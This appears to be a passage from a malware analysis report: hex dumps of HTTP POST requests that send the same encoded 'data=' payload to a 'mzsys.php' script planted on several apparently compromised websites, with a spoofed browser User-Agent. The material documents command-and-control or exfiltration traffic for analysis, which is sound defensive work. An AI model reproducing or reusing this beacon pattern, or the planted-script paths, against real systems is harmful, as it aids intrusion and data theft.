0x000002f0 (00752)   35343946 36303831 44304338 37333830   549F6081D0C87380
0x00000300 (00768)   43363041 35453541 45424438 41323933   C60A5E5AEBD8A293
0x00000310 (00784)   33373932 34443841 33464131 41454133   37924D8A3FA1AEA3
0x00000320 (00800)   36313239 35344144 34463245 37313243   612954AD4F2E712C
0x00000330 (00816)   44394141 37453730 43333831 45354442   D9AA7E70C381E5DB
0x00000340 (00832)   33384638 43333830 31303744 32313430   38F8C380107D2140
0x00000350 (00848)   35324634 30344431 38453530 41383932   52F404D18E50A892
0x00000360 (00864)   43393136 46303744 34334234 41393139   C916F07D43B4A919
0x00000370 (00880)   33303145 35313834 37333738 43454545   301E51847378CEEE
0x00000380 (00896)   37373032 42323942 30324530 43304542   7702B29B02E0C0EB
0x00000390 (00912)   34303334 42454338 36414630 33324443   4034BEC86AF032DC
0x000003a0 (00928)   43453846 41384641 34463444 38384345   CE8FA8FA4F4D88CE
0x000003b0 (00944)   46394631 33353343 30383441 30383441   F9F1353C084A084A
0x000003c0 (00960)   500dc8                                P..

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202c20 2c202c20 2c202c20   cept: , , , , , 
0x00000030 (00048)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000040 (00064)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000050 (00080)   2c202c20 0d0a436f 6e74656e 742d5479   , , ..Content-Ty
0x00000060 (00096)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000070 (00112)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000080 (00128)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x00000090 (00144)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x000000a0 (00160)   57696e64 6f777320 4e542036 2e333b20   Windows NT 6.3; 
0x000000b0 (00176)   574f5736 343b2054 72696465 6e742f37   WOW64; Trident/7
0x000000c0 (00192)   2e303b20 546f7563 683b2072 763a3131   .0; Touch; rv:11
0x000000d0 (00208)   2e302920 6c696b65 20476563 6b6f0d0a   .0) like Gecko..
0x000000e0 (00224)   486f7374 3a206368 6f6e6275 7269636f   Host: chonburico
0x000000f0 (00240)   6f702e6e 65740d0a 436f6e74 656e742d   op.net..Content-
0x00000100 (00256)   4c656e67 74683a20 3634350d 0a436163   Length: 645..Cac
0x00000110 (00272)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000120 (00288)   61636865 0d0a0d0a 64617461 3d393434   ache....data=944
0x00000130 (00304)   38443845 38444441 39424343 30354236   8D8E8DDA9BCC05B6
0x00000140 (00320)   45443345 33383543 32343638 35343138   ED3E385C24685418
0x00000150 (00336)   39303231 46393246 32384542 32313638   9021F92F28EB2168
0x00000160 (00352)   44364632 30323536 38344338 41434432   D6F2025684C8ACD2
0x00000170 (00368)   42363136 41374335 43463939 37434344   B616A7C5CF997CCD
0x00000180 (00384)   33463138 33434542 37314541 34353138   3F183CEB71EA4518
0x00000190 (00400)   34354136 33323530 34304337 33314335   45A6325040C731C5
0x000001a0 (00416)   38313242 30313039 38463735 42454637   812B01098F75BEF7
0x000001b0 (00432)   39463737 34343530 33423339 46444341   9F7744503B39FDCA
0x000001c0 (00448)   31434346 46334443 34383436 35364442   1CCFF3DC484656DB
0x000001d0 (00464)   44353431 34384344 33333046 41414436   D54148CD330FAAD6
0x000001e0 (00480)   31433044 45393538 37353037 38443945   1C0DE95875078D9E
0x000001f0 (00496)   46333734 45384231 45324344 30323346   F374E8B1E2CD023F
0x00000200 (00512)   30384342 34323234 31414437 38303533   08CB42241AD78053
0x00000210 (00528)   44384636 32423236 32454239 42334239   D8F62B262EB9B3B9
0x00000220 (00544)   31394437 38333736 35453039 46464633   19D783765E09FFF3
0x00000230 (00560)   46313233 45354444 37463942 38333833   F123E5DD7F9B8383
0x00000240 (00576)   39313243 43324630 46423545 43414246   912CC2F0FB5ECABF
0x00000250 (00592)   34364133 42354633 32324133 37444231   46A3B5F322A37DB1
0x00000260 (00608)   37343832 32363233 42363239 41433034   74822623B629AC04
0x00000270 (00624)   39444133 30384443 34324333 42453945   9DA308DC42C3BE9E
0x00000280 (00640)   36324441 44383138 37413535 34364244   62DAD8187A5546BD
0x00000290 (00656)   45303239 30303936 42313034 36423944   E0290096B1046B9D
0x000002a0 (00672)   42434336 31424634 44383041 44343435   BCC61BF4D80AD445
0x000002b0 (00688)   30383436 35313934 44373638 33324343   08465194D76832CC
0x000002c0 (00704)   31313442 46364239 34363037 36434230   114BF6B946076CB0
0x000002d0 (00720)   37313744 36453146 32454536 33314335   717D6E1F2EE631C5
0x000002e0 (00736)   37353439 46363038 31443043 38373338   7549F6081D0C8738
0x000002f0 (00752)   30433630 41354535 41454244 38413239   0C60A5E5AEBD8A29
0x00000300 (00768)   33333739 32344438 41334641 31414541   337924D8A3FA1AEA
0x00000310 (00784)   33363132 39353441 44344632 45373132   3612954AD4F2E712
0x00000320 (00800)   43443941 41374537 30433338 31453544   CD9AA7E70C381E5D
0x00000330 (00816)   42333846 38433338 30313037 44323134   B38F8C380107D214
0x00000340 (00832)   30353246 34303444 31384535 30413839   052F404D18E50A89
0x00000350 (00848)   32433931 36463037 44343342 34413931   2C916F07D43B4A91
0x00000360 (00864)   39333031 45353138 34373337 38434545   9301E51847378CEE
0x00000370 (00880)   45373730 32423239 42303245 30433045   E7702B29B02E0C0E
0x00000380 (00896)   42343033 34424543 38364146 30333244   B4034BEC86AF032D
0x00000390 (00912)   43434538 46413846 41344634 44383843   CCE8FA8FA4F4D88C
0x000003a0 (00928)   45463946 31333533 43303834 41384345   EF9F1353C084A8CE
0x000003b0 (00944)   46394631 33353343 30383441 30383441   F9F1353C084A084A
0x000003c0 (00960)   500dc8                                P..

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202c 202c202c 202c202c 202c202c   t: , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000080 (00128)   200d0a43 6f6e7465 6e742d54 7970653a    ..Content-Type:
0x00000090 (00144)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x000000a0 (00160)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x000000b0 (00176)   65640d0a 55736572 2d416765 6e743a20   ed..User-Agent: 
0x000000c0 (00192)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x000000d0 (00208)   646f7773 204e5420 362e333b 20574f57   dows NT 6.3; WOW
0x000000e0 (00224)   36343b20 54726964 656e742f 372e303b   64; Trident/7.0;
0x000000f0 (00240)   20546f75 63683b20 72763a31 312e3029    Touch; rv:11.0)
0x00000100 (00256)   206c696b 65204765 636b6f0d 0a486f73    like Gecko..Hos
0x00000110 (00272)   743a2070 6173736c 6966742e 636f6d0d   t: passlift.com.
0x00000120 (00288)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000130 (00304)   20363435 0d0a4361 6368652d 436f6e74    645..Cache-Cont
0x00000140 (00320)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000150 (00336)   0a646174 613d3934 34384438 45384444   .data=9448D8E8DD
0x00000160 (00352)   41394243 43303542 36454433 45333835   A9BCC05B6ED3E385
0x00000170 (00368)   43323436 38353431 38393032 31463932   C246854189021F92
0x00000180 (00384)   46323845 42323136 38443646 32303235   F28EB2168D6F2025
0x00000190 (00400)   36383443 38414344 32423631 36413743   684C8ACD2B616A7C
0x000001a0 (00416)   35434639 39374343 44334631 38334345   5CF997CCD3F183CE
0x000001b0 (00432)   42373145 41343531 38343541 36333235   B71EA451845A6325
0x000001c0 (00448)   30343043 37333143 35383132 42303130   040C731C5812B010
0x000001d0 (00464)   39384637 35424546 37394637 37343435   98F75BEF79F77445
0x000001e0 (00480)   30334233 39464443 41314343 46463344   03B39FDCA1CCFF3D
0x000001f0 (00496)   43343834 36353644 42443534 31343843   C484656DBD54148C
0x00000200 (00512)   44333330 46414144 36314330 44453935   D330FAAD61C0DE95
0x00000210 (00528)   38373530 37384439 45463337 34453842   875078D9EF374E8B
0x00000220 (00544)   31453243 44303233 46303843 42343232   1E2CD023F08CB422
0x00000230 (00560)   34314144 37383035 33443846 36324232   41AD78053D8F62B2
0x00000240 (00576)   36324542 39423342 39313944 37383337   62EB9B3B919D7837
0x00000250 (00592)   36354530 39464646 33463132 33453544   65E09FFF3F123E5D
0x00000260 (00608)   44374639 42383338 33393132 43433246   D7F9B8383912CC2F
0x00000270 (00624)   30464235 45434142 46343641 33423546   0FB5ECABF46A3B5F
0x00000280 (00640)   33323241 33374442 31373438 32323632   322A37DB17482262
0x00000290 (00656)   33423632 39414330 34394441 33303844   3B629AC049DA308D
0x000002a0 (00672)   43343243 33424539 45363244 41443831   C42C3BE9E62DAD81
0x000002b0 (00688)   38374135 35343642 44453032 39303039   87A5546BDE029009
0x000002c0 (00704)   36423130 34364239 44424343 36314246   6B1046B9DBCC61BF
0x000002d0 (00720)   34443830 41443434 35303834 36353139   4D80AD4450846519
0x000002e0 (00736)   34443736 38333243 43313134 42463642   4D76832CC114BF6B
0x000002f0 (00752)   39343630 37364342 30373137 44364531   946076CB0717D6E1
0x00000300 (00768)   46324545 36333143 35373534 39463630   F2EE631C57549F60
0x00000310 (00784)   38314430 43383733 38304336 30413545   81D0C87380C60A5E
0x00000320 (00800)   35414542 44384132 39333337 39323444   5AEBD8A29337924D
0x00000330 (00816)   38413346 41314145 41333631 32393534   8A3FA1AEA3612954
0x00000340 (00832)   41443446 32453731 32434439 41413745   AD4F2E712CD9AA7E
0x00000350 (00848)   37304333 38314535 44423338 46384333   70C381E5DB38F8C3
0x00000360 (00864)   38303130 37443231 34303532 46343034   80107D214052F404
0x00000370 (00880)   44313845 35304138 39324339 31364630   D18E50A892C916F0
0x00000380 (00896)   37443433 42344139 31393330 31453531   7D43B4A919301E51
0x00000390 (00912)   38343733 37384345 45453737 30324232   847378CEEE7702B2
0x000003a0 (00928)   39423032 45304330 45423430 33344245   9B02E0C0EB4034BE
0x000003b0 (00944)   43383641 46303332 44434345 38464138   C86AF032DCCE8FA8
0x000003c0 (00960)   46413446 34443838 43454639 46313335   FA4F4D88CEF9F135
0x000003d0 (00976)   33433038 3441                         3C084A

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202c20 2c202c20 2c202c20   cept: , , , , , 
0x00000040 (00064)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000050 (00080)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000060 (00096)   2c202c20 0d0a436f 6e74656e 742d5479   , , ..Content-Ty
0x00000070 (00112)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000080 (00128)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000090 (00144)   636f6465 640d0a55 7365722d 4167656e   coded..User-Agen
0x000000a0 (00160)   743a204d 6f7a696c 6c612f35 2e302028   t: Mozilla/5.0 (
0x000000b0 (00176)   57696e64 6f777320 4e542036 2e333b20   Windows NT 6.3; 
0x000000c0 (00192)   574f5736 343b2054 72696465 6e742f37   WOW64; Trident/7
0x000000d0 (00208)   2e303b20 546f7563 683b2072 763a3131   .0; Touch; rv:11
0x000000e0 (00224)   2e302920 6c696b65 20476563 6b6f0d0a   .0) like Gecko..
0x000000f0 (00240)   486f7374 3a206163 74696f6e 706f7572   Host: actionpour
0x00000100 (00256)   69737261 656c2e63 6f6d0d0a 436f6e74   israel.com..Cont
0x00000110 (00272)   656e742d 4c656e67 74683a20 3634350d   ent-Length: 645.
0x00000120 (00288)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000130 (00304)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000140 (00320)   3d393434 38443845 38444441 39424343   =9448D8E8DDA9BCC
0x00000150 (00336)   30354236 45443345 33383543 32343638   05B6ED3E385C2468
0x00000160 (00352)   35343138 39303231 46393246 32384542   54189021F92F28EB
0x00000170 (00368)   32313638 44364632 30323536 38344338   2168D6F2025684C8
0x00000180 (00384)   41434432 42363136 41374335 43463939   ACD2B616A7C5CF99
0x00000190 (00400)   37434344 33463138 33434542 37314541   7CCD3F183CEB71EA
0x000001a0 (00416)   34353138 34354136 33323530 34304337   451845A6325040C7
0x000001b0 (00432)   33314335 38313242 30313039 38463735   31C5812B01098F75
0x000001c0 (00448)   42454637 39463737 34343530 33423339   BEF79F7744503B39
0x000001d0 (00464)   46444341 31434346 46334443 34383436   FDCA1CCFF3DC4846
0x000001e0 (00480)   35364442 44353431 34384344 33333046   56DBD54148CD330F
0x000001f0 (00496)   41414436 31433044 45393538 37353037   AAD61C0DE9587507
0x00000200 (00512)   38443945 46333734 45384231 45324344   8D9EF374E8B1E2CD
0x00000210 (00528)   30323346 30384342 34323234 31414437   023F08CB42241AD7
0x00000220 (00544)   38303533 44384636 32423236 32454239   8053D8F62B262EB9
0x00000230 (00560)   42334239 31394437 38333736 35453039   B3B919D783765E09
0x00000240 (00576)   46464633 46313233 45354444 37463942   FFF3F123E5DD7F9B
0x00000250 (00592)   38333833 39313243 43324630 46423545   8383912CC2F0FB5E
0x00000260 (00608)   43414246 34364133 42354633 32324133   CABF46A3B5F322A3
0x00000270 (00624)   37444231 37343832 32363233 42363239   7DB174822623B629
0x00000280 (00640)   41433034 39444133 30384443 34324333   AC049DA308DC42C3
0x00000290 (00656)   42453945 36324441 44383138 37413535   BE9E62DAD8187A55
0x000002a0 (00672)   34364244 45303239 30303936 42313034   46BDE0290096B104
0x000002b0 (00688)   36423944 42434336 31424634 44383041   6B9DBCC61BF4D80A
0x000002c0 (00704)   44343435 30383436 35313934 44373638   D44508465194D768
0x000002d0 (00720)   33324343 31313442 46364239 34363037   32CC114BF6B94607
0x000002e0 (00736)   36434230 37313744 36453146 32454536   6CB0717D6E1F2EE6
0x000002f0 (00752)   33314335 37353439 46363038 31443043   31C57549F6081D0C
0x00000300 (00768)   38373338 30433630 41354535 41454244   87380C60A5E5AEBD
0x00000310 (00784)   38413239 33333739 32344438 41334641   8A29337924D8A3FA
0x00000320 (00800)   31414541 33363132 39353441 44344632   1AEA3612954AD4F2
0x00000330 (00816)   45373132 43443941 41374537 30433338   E712CD9AA7E70C38
0x00000340 (00832)   31453544 42333846 38433338 30313037   1E5DB38F8C380107
0x00000350 (00848)   44323134 30353246 34303444 31384535   D214052F404D18E5
0x00000360 (00864)   30413839 32433931 36463037 44343342   0A892C916F07D43B
0x00000370 (00880)   34413931 39333031 45353138 34373337   4A919301E5184737
0x00000380 (00896)   38434545 45373730 32423239 42303245   8CEEE7702B29B02E
0x00000390 (00912)   30433045 42343033 34424543 38364146   0C0EB4034BEC86AF
0x000003a0 (00928)   30333244 43434538 46413846 41344634   032DCCE8FA8FA4F4
0x000003b0 (00944)   44383843 45463946 31333533 43303834   D88CEF9F1353C084
0x000003c0 (00960)   41413446 34443838 43454639 46313335   AA4F4D88CEF9F135
0x000003d0 (00976)   33433038 3441                         3C084A


Strings